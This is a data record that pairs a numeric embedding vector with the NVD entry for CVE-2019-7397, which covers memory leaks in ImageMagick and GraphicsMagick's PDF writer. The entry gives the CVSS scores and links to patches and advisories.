0.016344571486115456, 0.0016665091970935464, 0.013261284679174423, 0.019758211448788643, -0.01765025034546852, -0.03463979437947273, 0.0188458114862442, -0.008911645971238613, -0.0002223241317551583, 0.0015652405563741922, 0.017005275934934616, -0.01201066467911005, -0.004695721436291933, -0.014433247968554497, -0.021221201866865158, 0.020167220383882523, 0.003142279339954257, -0.0010736448457464576, 0.015031028538942337, -0.021331317722797394, 0.012828679755330086, 0.022998811677098274, 0.0008789730491116643, 0.006292424164712429, 0.009289191104471684, 0.017886215820908546, -0.002727372571825981, 0.0007472253637388349, -0.019569439813494682, -0.009359980933368206, 0.012647773139178753, 0.008644217625260353, 0.001061846618540585, -0.014842255972325802, -0.04580884799361229, 0.002621188061311841, 0.016910890117287636, -0.01138142216950655, -0.005828358232975006, 0.020497571676969528, -0.008620621636509895, 0.006677835248410702, 0.01157019566744566, -0.00026644484023563564, -0.007271682843565941, -0.0002782431256491691, -0.005545198917388916, 0.027088886126875877, 0.0006046626367606223, -0.0009069939842447639, 0.0020922310650348663, 0.02515396662056446, 0.004333907272666693, -0.01105106994509697, 0.004919889383018017, -0.021960560232400894, 0.023030273616313934, 0.027041694149374962, 0.012529789470136166, -0.018546920269727707, 0.012057858519256115, -0.02269992046058178, -0.04354357719421387, -0.001186711946502328, 0.010862297378480434, -0.0026310200337320566, -0.011814027093350887, -0.00454627675935626, 0.0013341906014829874, 0.021000966429710388, 0.010052148252725601, 0.014244475401937962, -0.01039036549627781, -0.0000195716511370847, 0.004782242700457573, -0.007255951873958111, -0.017697444185614586, -0.011562329716980457, -0.028331641107797623, 0.02430448867380619, 0.0123252859339118, -0.01692662201821804, -0.004723250865936279, -0.009981358423829079, 0.0015603245701640844, 0.003549320623278618, -0.0012722495011985302, -0.004648528527468443, -0.0036279759369790554, -0.017005275934934616, 0.0075312452390789986, -0.0034922955092042685, -0.01765025034546852, 0.03429371118545532, 0.010398231446743011, -0.008691411465406418, 0.004982813727110624, 0.008416117168962955, -0.0028433892875909805, 0.008935242891311646, 0.017131125554442406, -0.0025720284320414066, 0.019600901752710342, 0.02427302673459053, -0.021803250536322594, -0.007255951873958111, 0.011027473956346512, -0.021834712475538254, -0.0032602623105049133, -0.0022849366068840027, 0.002261339919641614, 0.041309766471385956, 0.024414606392383575, 0.013269149698317051, -0.006241298280656338, -0.0154636325314641, -0.03523757681250572, 0.0011847454588860273, -0.014118626713752747, 0.002833557315170765, 0.008534100838005543, -0.031289078295230865, 0.006685700733214617, 0.04423574358224869, -0.02395840547978878, 0.003962261136621237, -0.0006675868644379079, -0.011554463766515255, -0.010885894298553467, 0.0009694266482256353, -0.007708219811320305, 0.013953451067209244, -0.0023911213502287865, -0.030691299587488174, 0.008738604374229908, 0.016029950231313705, -0.0020588026382029057, 0.03224867582321167, -0.0069373976439237595, -0.012797217816114426, -0.02487080730497837, -0.024666303768754005, -0.012883738614618778, 0.024571916088461876, 0.008848722092807293, 0.021834712475538254, -0.0076688919216394424, 0.00206470163539052, -0.008101495914161205, -0.0013469720724970102, -0.006276693195104599, -0.00599746685475111, -0.012710697017610073, -0.02295161783695221, 0.000997939147055149, -0.015007431618869305, 0.006964927073568106, 0.024886537343263626, -0.019553707912564278, -0.011279170401394367, -0.0259090568870306, -0.000877989805303514, 0.011231977492570877, 0.021897636353969574, -0.011231977492570877, -0.004188395105302334, -0.03086434118449688, -0.005525534972548485, -0.01234101690351963, -0.015715328976511955, -0.0017874417826533318, -0.004790108185261488, -0.009910568594932556, 0.002267239149659872, -0.015266994945704937, -0.022747114300727844, 0.0018975591519847512, 0.015746792778372765, 0.015959160402417183, -0.013308477587997913, 0.016659192740917206, 0.009800450876355171, -0.013693888671696186, -0.010060013271868229, -0.018263760954141617, -0.011640984565019608, -0.01297025941312313, 0.005210913717746735, -0.017508670687675476, 0.01516474224627018, 0.00768462335690856, -0.009871240705251694, 0.002314432291314006, 0.0028512547723948956, -0.010154400020837784, 0.013961316086351871, -0.030880073085427284, -0.036307286471128464, 0.011106128804385662, 0.0016134169418364763, 0.002644784515723586, 0.011939874850213528, 0.0016448789974674582, -0.0070868427865207195, 0.0031757079996168613, -0.01673784852027893, 0.02361232228577137, -0.03451394662261009, -0.018798617646098137, -0.0076492284424602985, -0.005317098461091518, -0.011892681941390038, 0.019113238900899887, 0.02175605669617653, -0.02210213989019394, -0.007995312102138996, 0.007476186845451593, -0.03646459802985191, -0.013898392207920551, 0.009477963671088219, 0.0001617349626030773, -0.02430448867380619, -0.003150144824758172, -0.0010470987763255835, 0.009619543328881264, 0.0005967970937490463, 0.00599746685475111, 0.0044322265312075615, 0.0054744090884923935, -0.014936641789972782, 0.011758968234062195, -0.009328518994152546, 0.0024088185746222734, 0.04876628890633583, 0.0029417083133012056, -0.0014561063144356012, 0.0033762790262699127, 0.0077947406098246574, 0.018798617646098137, -0.008266672492027283, 0.012443268671631813, -0.0009212502627633512, 0.007613833528012037, 0.007771144155412912, -0.009603812359273434, 0.002546465490013361, -0.007963849231600761, 0.01765025034546852, -0.009273460134863853, -0.0006017130799591541, 0.014228744432330132, 0.02411571703851223, -0.021897636353969574, 0.011475808918476105, -0.0081644207239151, 0.002690011402592063, -0.03095872700214386, 0.014991700649261475, 0.013394998386502266, 0.008534100838005543, -0.0016429126262664795, -0.005356426350772381, 0.00738573307171464, 0.011074666865170002, -0.006548054050654173, 0.022715652361512184, -0.0006597213796339929, -0.0017805594252422452, -0.002259373664855957, 0.011924143880605698, 0.020135758444666862, -0.007696421351283789, 0.013426460325717926, -0.02408425323665142, 0.012836545705795288, 0.00033993838587775826, -0.02235383726656437, 0.01293879747390747, -0.015770388767123222, 0.0005353476735763252, 0.008329596370458603, 0.0030754224862903357, 0.00632781907916069, 0.00035075348569080234, 0.001601618598215282, -0.001721567939966917, -0.0048962924629449844, 0.028142867609858513, 0.017414284870028496, -0.004931687377393246, 0.004518747329711914, -0.01201066467911005, -0.019569439813494682, -0.007468320894986391, 0.015243398025631905, 0.011137590743601322, 0.013819737359881401, 0.015314187854528427, -0.005132258404046297, -0.018688499927520752, 0.019553707912564278, 0.019239086657762527, 0.010697121731936932, 0.007739681750535965, 0.006437936797738075, -0.03696799278259277, 0.01749293878674507, -0.006579515989869833, -0.0009148595272563398, 0.007193027529865503, 0.00363387493416667, -0.0002988901687785983, -0.01588837057352066, 0.021268393844366074, 0.028378833085298538, -0.007295279297977686, 0.0016006354708224535, -0.028158599510788918, 0.00583229074254632, -0.0003028229111805558, -0.0019565506372600794, -0.005781164858490229, -0.0023458944633603096, -0.012930931523442268, 0.012482596561312675, -0.018468264490365982, 0.006721095647662878, 0.021929098293185234, -0.004959216807037592, -0.008927376940846443, -0.01224663108587265, 0.020418917760252953, -0.021079622209072113, 0.0025503982324153185, -0.007200893014669418, 0.037660159170627594, 0.024225832894444466, -0.016281647607684135, -0.02298307977616787, 0.030565451830625534, -0.006862675305455923, 0.014873717911541462, 0.00027234398294240236, 0.005789030343294144, 0.0067682890221476555, -0.003570950822904706, 0.020890848711133003, -0.011247708462178707, 0.008156554773449898, -0.00047611037734895945, 0.024383144453167915, -0.03259475901722908, 0.010681389831006527, 0.012199437245726585, -0.012451134622097015, -0.0057497029192745686, 0.027261927723884583, 0.008581293746829033, -0.0062216343358159065, -0.010476886294782162, 0.012750024907290936, -0.0004901208449155092, 0.012553386390209198, -0.016690654680132866, -0.013371401466429234, -0.006744692102074623, -0.03278353065252304, 0.016100740060210228, -0.01230955496430397, 0.0087936632335186, -0.0043221088126301765, -0.022149333730340004, -0.0038147822488099337, -0.004141201730817556, 0.038792796432971954, -0.0031835734844207764, -0.009454367682337761, 0.014677079394459724, -0.005383955780416727, 0.0036555053666234016, -0.013819737359881401, -0.04247386381030083, -0.0016753579257056117, -0.0036299421917647123, 0.025515779852867126, -0.002861086744815111, -0.018893003463745117, -0.008581293746829033, -0.0012142412597313523, -0.009651006199419498, -0.0020175084937363863, -0.002802095143124461, -0.004420428071171045, -0.01042182743549347, 0.015707464888691902, -0.005419350229203701, -0.0038403451908379793, 0.0025189360603690147, -0.0055334004573524, -0.02244822308421135, -0.019254818558692932, 0.008313865400850773, -0.002878784202039242, 0.0024147178046405315, -0.004459755960851908, -0.014629886485636234, 0.011058935895562172, -0.011829758062958717, -0.002404885832220316, 0.012238765135407448, 0.017665980383753777, -0.003232732880860567, 0.006803683936595917, -0.013387132436037064, 0.00884085614234209, -0.02317185327410698, -0.014315265230834484, 0.015573750250041485, -0.007712152786552906, 0.006257029250264168, -0.007664959412068129, 0.02572028525173664, 0.00034977030009031296, 0.03250037133693695, 0.015998488292098045, 0.01768171228468418, 0.011546598747372627, 0.007110439706593752, -0.010602734982967377, -0.013961316086351871, 0.02238529920578003, -0.018625576049089432, -0.0021826846059411764, -0.008974569849669933, -0.015329918824136257, 0.014126492664217949, -0.003895403817296028, 0.009934164583683014, -0.007617766037583351, 0.00768462335690856, -0.02468203380703926, 0.008219479583203793, 0.03073849342763424, -0.011436481028795242, 0.0013538544299080968, -0.020717807114124298, 0.024823613464832306, -0.019522245973348618, -0.006980658043175936, -0.002259373664855957, 0.003466732567176223, -0.022872962057590485, 0.0033330183941870928, -0.015031028538942337, -0.013048915192484856, -0.014386055059731007, -0.019569439813494682, -0.023502204567193985, -0.013308477587997913, -0.009501560591161251, -0.0031363803427666426, 0.029621588066220284, 0.007137968670576811, 0.008361059240996838, -0.013835468329489231, -0.005065401550382376, 0.013308477587997913, -0.0076688919216394424, -0.014189416542649269, 0.007857664488255978, -0.011279170401394367, -0.02354939840734005, -0.005014275666326284, 0.002501238603144884, -0.023753901943564415, -0.026491105556488037, -0.027324853464961052, -0.0008175235707312822, 0.015558019280433655, -0.0059188115410506725, 0.013835468329489231, 0.013229821808636189, -0.018452534452080727, 0.0008829057915136218, 0.004809771664440632, -0.01566813699901104, -0.02521689049899578, 0.01320622581988573, 0.012521924450993538, -0.017036739736795425, 0.0012152245035395026, -0.00021236932661850005, -0.03272060677409172, 0.008895915001630783, 0.0023871883749961853, 0.0011739303590729833, 0.013103974051773548, 0.017823291942477226, -0.012333151884377003, 0.019884061068296432, 0.0022161132656037807, -0.0028237253427505493, -0.007578438613563776, -0.003938664216548204, -0.0005830324371345341, 0.0014148122863844037, 0.001191627816297114, -0.002817826345562935, -0.000019371940652490593, 0.01661200076341629, -0.010587004013359547, 0.004550209268927574, 0.012144379317760468, -0.0016065345844253898, -0.017634518444538116, 0.013725350610911846, -0.00444402452558279, 0.020733539015054703, -0.0011827790876850486, -0.019427860155701637, -0.021960560232400894, -0.004652461037039757, 0.015274859964847565, -0.001988012809306383, -0.04401550814509392, -0.0025444990023970604, 0.0034922955092042685, 0.016753580421209335, -0.004959216807037592, -0.002802095143124461, -0.011719640344381332, -0.005427216179668903, 0.008549831807613373, -0.01478719711303711, -0.03558366000652313, 0.0021807183511555195, 0.011924143880605698, 0.023470742627978325, -0.003836412448436022, -0.02147289738059044, 0.0033113881945610046, 0.00043653693865053356, -0.018546920269727707, -0.02279430627822876, 0.025798939168453217, -0.006418272852897644, 0.013866930268704891, 0.004337840247899294, -0.0012948629446327686, -0.019663825631141663, 0.00521877920255065, 0.0047507802955806255, 0.011294901371002197, -0.002450112719088793, 0.007472253870218992, 0.009627409279346466, -0.0045934696681797504, -0.019711019471287727, 0.006807616446167231, -0.02919684909284115, -0.021142546087503433, -0.00019135361071676016, -0.02490226924419403, -0.0067918854765594006, 0.0027450700290501118, -0.019239086657762527, 0.010665658861398697, 0.003557186108082533, 0.019758211448788643, -0.010799373500049114, 0.01451976876705885, 0.0030006999149918556, -0.01042182743549347, -0.006587381940335035, 0.004833368584513664, 0.026900114491581917, 0.007621699012815952, -0.001548526342958212, 0.003557186108082533, -0.005883416626602411, 0.01092522218823433, 0.022841500118374825, 0.041718773543834686, -0.014983835630118847, -0.005262040067464113, 0.01075217965990305, 0.016753580421209335, 0.02131558768451214, -0.0013951484579592943, 0.0010008887620642781, 0.01636030338704586, -0.012514058500528336, -0.006858742330223322, 0.0012614344013854861, 0.004731116350740194, -0.009328518994152546, 0.026900114491581917, -0.0075312452390789986, -0.006083987653255463, -0.006359281484037638, 0.009493695572018623, 0.0051637208089232445, -0.02616075426340103, -0.020450379699468613, -0.004514814354479313, 0.01138142216950655, 0.0006115449941717088, 0.010744314640760422, -0.00548620754852891, 0.014354593120515347, 0.001891660038381815, 0.018877273425459862, -0.0054901400581002235, 0.012105051428079605, 0.016344571486115456, -0.007487984839826822, 0.019050315022468567, -0.005277771037071943, -0.005844089202582836, 0.00940717477351427, -0.0003219951468054205, -0.025610167533159256, -0.009737526997923851, 0.024351682513952255, -0.013874795287847519, -0.002961372258141637, -0.003920966759324074, -0.0072048259899020195, 0.007708219811320305, -0.012167975306510925, 0.0030242963694036007, -0.0008632419630885124, -0.0063317520543932915, 0.01075217965990305, -0.0031363803427666426, -0.0033841445110738277, 0.002570061944425106, -0.023187583312392235, -0.00012160847109043971, -0.02263699658215046, -0.03246891126036644, -0.026113560423254967, 0.015141146257519722, 0.011444346979260445, 0.008604890666902065, 0.00411367230117321, 0.005387888289988041, -0.002613322576507926, 0.005973870400339365, 0.002200382063165307, 0.015471498481929302, -0.005840156227350235, -0.01714685559272766, -0.027041694149374962, -0.012144379317760468, 0.008093630895018578, 0.013591636903584003, -0.017319897189736366, -0.012183706276118755, -0.007975648157298565, -0.000028282112907618284, 0.012978125363588333, -0.0033133546821773052, 0.01787048578262329, 0.009359980933368206, 0.010461155325174332, -0.020686345174908638, -0.01834241673350334, -0.004392898641526699, 0.02948000840842724, 0.01780756004154682, -0.00441256258636713, -0.00740146404132247, 0.007448657415807247, 0.020670613273978233, -0.0069295321591198444, -0.020387453958392143, 0.012372479774057865, -0.006257029250264168, 0.0000806831376394257, -0.018421072512865067, -0.010870163328945637, -0.012915200553834438, 0.007696421351283789, 0.002552364720031619, -0.0002456749207340181, -0.01598275825381279, -0.004400764126330614, 0.014684945344924927, -0.011845489032566547, -0.010799373500049114, 0.021299855783581734, -0.018688499927520752, 0.011153321713209152, 0.003112783655524254, 0.0033487495966255665, -0.0238640196621418, 0.006422205362468958, -0.016816504299640656, 0.0021826846059411764, 0.0345454104244709, -0.019773943349719048, -0.00852623488754034, 0.040900759398937225, -0.032138556241989136, 0.010413962416350842, 0.020717807114124298, 0.010838700458407402, 0.014496172778308392, 0.014889448881149292, 0.005100796464830637, 0.0027155743446201086, -0.009949895553290844, 0.018782885745167732, 0.00044071549200452864, -0.016501883044838905, 0.0039013030473142862, -0.037093840539455414, 0.02163020893931389, -0.007342472672462463, 0.0013046948006376624, -0.02317185327410698, 0.010162265039980412, -0.013512981124222279, -0.001476753386668861, -0.002570061944425106, 0.01853119023144245, 0.004927754867821932, 0.0006459566648118198, 0.015880506485700607, -0.038226477801799774, -0.0002111403300659731, 0.015392842702567577, 0.02452472411096096, 0.007173363585025072, 0.0025798939168453217, -0.0007619732641614974, -0.0007786875357851386, 0.005242376122623682, 0.01125557441264391, 0.0028591202571988106, -0.004565940238535404, 0.019286280497908592, -0.00010538581409491599, 0.007798673585057259, 0.015935564413666725, 0.020434647798538208, -0.0064890626817941666, 0.01629737950861454, 0.018924465402960777, 0.0011611488880589604, -0.011656716465950012, -0.023250507190823555, 0.01134996023029089, -0.031918320804834366, -0.0029417083133012056, -0.0028237253427505493, 0.009320653975009918, -0.03552073612809181, 0.0030242963694036007, 0.019128970801830292, 0.014087164774537086, 0.02364378422498703, 0.030471064150333405, 0.006697499193251133, -0.017917677760124207, -0.009257729165256023, -0.007920589298009872, 0.01730416715145111, 0.0008057252853177488, -0.015927698463201523, 0.0009930231608450413, -0.010893759317696095, 0.005073267035186291, 0.003036094829440117, -0.009430770762264729, 0.001857248367741704, 0.03608705475926399, 0.0003453459357842803, -0.002532700775191188, 0.017115393653512, 0.02295161783695221, -0.004837301094084978, 0.010256651788949966, -0.030942996963858604, 0.014441113919019699, -0.003201270941644907, -0.021897636353969574, 0.017854753881692886, 0.007149767130613327, 0.013284880667924881, -0.015298456884920597, 0.0005923727294430137, -0.010351037606596947, 0.021803250536322594, -0.010626331903040409, -0.0018021896248683333, 0.002636919030919671, -0.00586375268176198, 0.0071969605050981045, 0.0066503058187663555, 0.00598173588514328, 0.007322808727622032, 0.011774699203670025, 0.02188190631568432, 0.019648095592856407, -0.003608311992138624, 0.008034639060497284, 0.004491217900067568, 0.00783406849950552, 0.017886215820908546, 0.001317476388067007, -0.008785797283053398, 0.003852143418043852, 0.011892681941390038, -0.011766833253204823, -0.006174441426992416, 0.010492617264389992, 0.002139424206689, 0.0022770711220800877, 0.006272760685533285, 0.009179074317216873, 0.003720395965501666, -0.011452211998403072, -0.009989223442971706, -0.01139715313911438, -0.010563407093286514, -0.016100740060210228, -0.0053053004667162895, -0.0006897086859680712, -0.000029357477615121752, -0.0021354914642870426, 0.0014757701428607106, -0.00822734460234642, -0.010815104469656944, 0.0030321618542075157, -0.005513736978173256, 0.0014138290425762534, -0.00158588751219213, -0.002998733427375555, -0.006406474392861128, -0.0031973381992429495, 0.0020823990926146507, -0.003366447053849697, -0.019711019471287727, -0.000651855836622417, 0.004038949962705374, 0.025295546278357506, -0.01254552137106657, -0.0110668009147048, 0.016344571486115456, 0.019962716847658157, 0.021535823121666908, 0.006378944963216782, -0.006898070219904184, -0.01510181836783886, 0.004211991559714079, 0.010162265039980412, 0.01790194772183895, -0.023753901943564415, 0.020340261980891228, 0.0057497029192745686, -0.006386810913681984, 0.010303844697773457, 0.031949784606695175, -0.01201066467911005, 0.021174008026719093, 0.010492617264389992, -0.0018139879684895277, -0.006662104278802872, -0.011688178405165672, -0.01541643962264061, 0.0031973381992429495, -0.0014118626713752747, 0.010052148252725601, -0.01614006794989109, -0.006968860048800707, -0.001998828025534749, 0.005151922348886728, 0.01101960800588131, -0.008093630895018578, 0.004141201730817556, -0.016910890117287636, -0.015613078139722347, -0.010563407093286514, 0.04197046905755997, -0.006673902738839388, 0.005442947149276733, -0.013284880667924881, -0.002328197006136179, 0.011011742986738682, 0.004278848413378, -0.0005309233092702925, 0.0036967992782592773, 0.0070868427865207195, -0.008919511921703815, -0.010233054868876934, 0.008557696826756, -0.016659192740917206, -0.01746147684752941, 0.028630530461668968, 0.022652728483080864, 0.0015259128995239735, 0.006288491655141115, 0.0015357447555288672, 0.007436858955770731, -0.0034333039075136185, -0.017036739736795425, 0.000194917680346407, -0.0026723139453679323, -0.007605968043208122, -0.01286014262586832, 0.003563085338100791, -0.005576660856604576, -0.01536924671381712, 0.037723083049058914, -0.00768462335690856, -0.0012683167587965727, 0.004967082291841507, 0.0015495094703510404, 0.0030537922866642475, 0.00631208810955286, 0.024320220574736595, 0.00457773869857192, 0.014268072322010994, -0.009375711902976036, 0.0000983805803116411, -0.01138142216950655, -0.015518691390752792, -0.007122237700968981, 0.02178751863539219, 0.0046170661225914955, 0.02081219293177128, 0.007259884383529425, -0.005899147596210241, -0.008077899925410748, 0.01626591756939888, -0.009053225629031658, 0.002267239149659872, -0.002853221260011196, -0.015990624204277992, 0.010524080134928226, 0.0087936632335186, -0.010162265039980412, -0.0015426271129399538, 0.009548753499984741, -0.016785042360424995, 0.03388470411300659, -0.0024815748911350965, 0.005737904459238052, 0.021236931905150414, -0.004904158413410187, 0.010154400020837784, 0.002320331521332264, 0.018200837075710297, 0.0019113238668069243, -0.0037125302478671074, 0.0075155142694711685, 0.016596268862485886, 0.025956250727176666, 0.01573106087744236, 0.01809071935713291, 0.002711641602218151, -0.011452211998403072, 0.0000619717757217586, -0.0007698388071730733, -0.00047144023119471967, 0.0046170661225914955, -0.0016832235269248486, -0.005147989839315414, -0.010115072131156921, 0.029495738446712494, -0.006209836341440678, 0.0012329218443483114, -0.004738981835544109, -0.007177296560257673, 0.0307699553668499, 0.011342095211148262, -0.01040609646588564, -0.04779096320271492, 0.014260206371545792, 0.02988901548087597, -0.025610167533159256, 0.032107096165418625, -0.00854196585714817, 0.025893326848745346, 0.0008135908283293247, 0.01073644869029522, 0.009076821617782116, 0.011987068690359592, -0.013536578044295311, -0.0028374900575727224, 0.008699276484549046, 0.025641629472374916, -0.012600579299032688, 0.016085010021924973, 0.009367846883833408, -0.019758211448788643, -0.01196347177028656, 0.005427216179668903, 0.006988523993641138, -0.00412940327078104, -0.04392112046480179, -0.02471349574625492, -0.004270982928574085, 0.0056002577766776085, 0.014047836884856224, 0.027781052514910698, 0.0018798618111759424, -0.013033184222877026, 0.010524080134928226, -0.031100306659936905, -0.011483673937618732, 0.010964549146592617, -0.005380022805184126, -0.013324208557605743, -0.026868652552366257, 0.011578060686588287, 0.008423983119428158, 0.00019073911244049668, 0.010398231446743011, -0.002011609496548772, 0.001902475138194859, -0.0029122126288712025, -0.026742802932858467, 0.019459322094917297, -0.006351415999233723, 0.004978880751878023, -0.010146534070372581, -0.015620943158864975, 0.014110761694610119, -0.015471498481929302, -0.01158592663705349, 0.01166458148509264, 0.00040679541416466236, 0.008431848138570786, 0.011200515553355217, 0.0023871883749961853, -0.008644217625260353, 0.018877273425459862, 0.03051825799047947, -0.009611678309738636, -0.013332073576748371, -0.003856076393276453, 0.0035473541356623173, 0.01157019566744566, -0.014441113919019699, -0.003759723622351885, -0.0110668009147048, -0.011869085021317005, -0.01595129631459713, 0.011412885040044785, 0.021079622209072113, -0.0026880449149757624, -0.02634952776134014, 0.0073660691268742085, 0.026522569358348846, -0.006508726626634598, 0.008652083575725555, 0.006559852510690689, -0.001564257312566042, 0.010783642530441284, 0.004644595552235842, 0.007987446151673794, -0.02131558768451214, 0.016627730801701546, 0.009831912815570831, 0.001415795530192554, -0.026648417115211487, -0.01614006794989109, 0.011310632340610027, -0.00887231808155775, 0.0023616254329681396, -0.010933087207376957, 0.023030273616313934, 0.0005732005229219794, 0.019805405288934708, 0.02332916297018528, 0.03325546160340309, -0.0012830646010115743, -0.0016350471414625645, 0.0002703776117414236, 0.0011375523172318935, -0.005726105999201536, 0.012569117359817028, 0.01856265217065811, -0.009454367682337761, -0.027246197685599327, -0.008620621636509895, 0.0020470041781663895, 0.008093630895018578, -0.025358470156788826, -0.016501883044838905, -0.013678157702088356, 0.004487284924834967, -0.01322195678949356, 0.018893003463745117, 0.0016468454850837588, 0.008219479583203793, 0.003631908679381013, 0.00771608529612422, 0.009721796028316021, -0.002104029292240739, 0.009249864146113396, 0.027576548978686333, -0.001375484629534185, -0.0034549343399703503, 0.00814868975430727, -0.0018847776809707284, -0.0006169525440782309, 0.06075335666537285, 0.012136513367295265, -0.01202639564871788, -0.001317476388067007, 0.0006729944725520909, 0.016407497227191925, 0.0027450700290501118, -0.028048481792211533, -0.004754713270813227, -0.0240213293582201, -0.004872696008533239, -0.012765755876898766, -0.004782242700457573, -0.004620999097824097, -0.01636030338704586, 0.01260844524949789, 0.006426138337701559, 0.006913801189512014, -0.02166167087852955, -0.01263990718871355, 0.0026310200337320566, -0.018893003463745117, -0.011884815990924835, -0.004373234696686268, 0.006587381940335035, 0.013048915192484856, 0.00021052583178970963, -0.018767155706882477, -0.0015514758415520191, -0.02203921601176262, 0.009635274298489094, -0.009029628708958626, 0.007511581759899855, -0.004282781388610601, 0.014677079394459724, 0.009580216370522976, -0.011790430173277855, 0.01730416715145111, -0.0062216343358159065, -0.021897636353969574, -0.016753580421209335, -0.008203748613595963, 0.007440791931003332, 0.003509992966428399, -0.03287791833281517, 0.03259475901722908, -0.019600901752710342, 0.02112681418657303, 0.011231977492570877, 0.02147289738059044, 0.002609389601275325, 0.008675680495798588, -0.009477963671088219, 0.018735693767666817, 0.007955984212458134, 0.0022652726620435715, 0.0059188115410506725, -0.0034392031375318766, -0.009485829621553421, -0.004239520989358425, 0.005879484117031097, 0.0013872829731553793, -0.008306000381708145, -0.016407497227191925, -0.014220879413187504, -0.0017982568824663758, 0.0003770538605749607, -0.0005397720378823578, 0.0024304490070790052, 0.02229091338813305, -0.03124188631772995, 0.0004974948242306709, 0.0015042826998978853, -0.014055702835321426, 0.003999622073024511, -0.0232347771525383, 0.004813704639673233, -0.008235210552811623, 0.006422205362468958, 0.012915200553834438, -0.004687855951488018, 0.003981924615800381, -0.0081644207239151, -0.013418595306575298, 0.026318063959479332, -0.020450379699468613, 0.01705246977508068, -0.008345327340066433, 0.003126548370346427, 0.001926071709021926, 0.007790807634592056, 0.00738573307171464, 0.006064323708415031, -0.017225511372089386, 0.015424305573105812, -0.005891282111406326, 0.015896236523985863, -0.0015278792707249522, 0.006390743423253298, -0.0016635596984997392, 0.028583336621522903, -0.00020192291412968189, -0.00018189038382843137, -0.007845866493880749, 0.006095786113291979, -0.02398986741900444, 0.0020234077237546444, -0.004208058584481478, -0.005439014174044132, -0.009957761503756046, 0.007200893014669418, -0.005505871493369341, -0.005147989839315414, -0.010579138062894344, -0.0047350493259727955, 0.019176162779331207, 0.021488629281520844, -0.01676931045949459, 0.013921989127993584, 0.03061264380812645, -0.0066345748491585255, 0.004778309725224972, 0.014079299755394459, -0.01448830682784319, 0.012490462511777878, -0.012285958044230938, 0.004530545324087143, 0.00821161363273859, 0.01234101690351963, -0.0027902969159185886, 0.011279170401394367, -0.002509104087948799, 0.00005490508920047432, 0.008093630895018578, 0.03275206685066223, -0.004664259497076273, 0.0037990512792021036, 0.012694966048002243, -0.005612055771052837, 0.008722873404622078, 0.012553386390209198, 0.07362136244773865, 0.011137590743601322, 0.00008498459646943957, -0.019223356619477272, -0.01070498675107956, 0.004904158413410187, -0.017980601638555527, -0.00819588266313076, -0.0016468454850837588, 0.015455767512321472, -0.014873717911541462, -0.00756664015352726, -0.010004954412579536, -0.008652083575725555, 0.029338428750634193, 0.012120782397687435, 0.041435614228248596, 0.0005392804159782827, 0.024918001145124435, 0.03278353065252304, 0.017477208748459816, 0.016006354242563248, 0.004982813727110624, -0.002833557315170765, -0.008644217625260353, 0.029558662325143814, 0.013080377131700516, -0.009344249963760376, -0.008549831807613373, -0.02537420019507408, -0.011121859773993492, 0.023407818749547005, -0.0009704098338261247, 0.015754656866192818, 0.010280247777700424, 0.018106451258063316, 0.014047836884856224, 0.027293389663100243, -0.0007378850714303553, -0.017665980383753777, -0.0018444668967276812, -0.004499083384871483, 0.006583448965102434, -0.00014747869863640517, 0.004385033156722784, -0.010893759317696095, -0.00751944724470377, 0.01752440258860588, -0.005293502006679773, 0.0060367947444319725, -0.004691788926720619, 0.001498383586294949, 0.01064206287264824, 0.007051447872072458, 0.03542634844779968, -0.015204070135951042, 0.016973813995718956, 0.03246891126036644, -0.007617766037583351, 0.013269149698317051, 0.005088998004794121, -0.005104729440063238, -0.019003121182322502 ]
2,285
CVE-2019-7397
2019-02-05T00:29:00.510000
In ImageMagick before 7.0.8-25 and GraphicsMagick through 1.3.31, several memory leaks exist in WritePDFImage in coders/pdf.c.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "[email protected]", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "http://hg.graphicsmagick.org/hg/GraphicsMagick/rev/11ad3aeb8ab1" }, { "source": "[email protected]", "tags": [ "Broken Link", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "source": "[email protected]", "tags": [ "Broken Link" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "source": "[email protected]", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "http://www.securityfocus.com/bid/106847" }, { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/commit/306c1f0fa5754ca78efd16ab752f0e981d4f6b82" }, { "source": "[email protected]", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1454" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4034-1/" }, { "source": "[email protected]", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
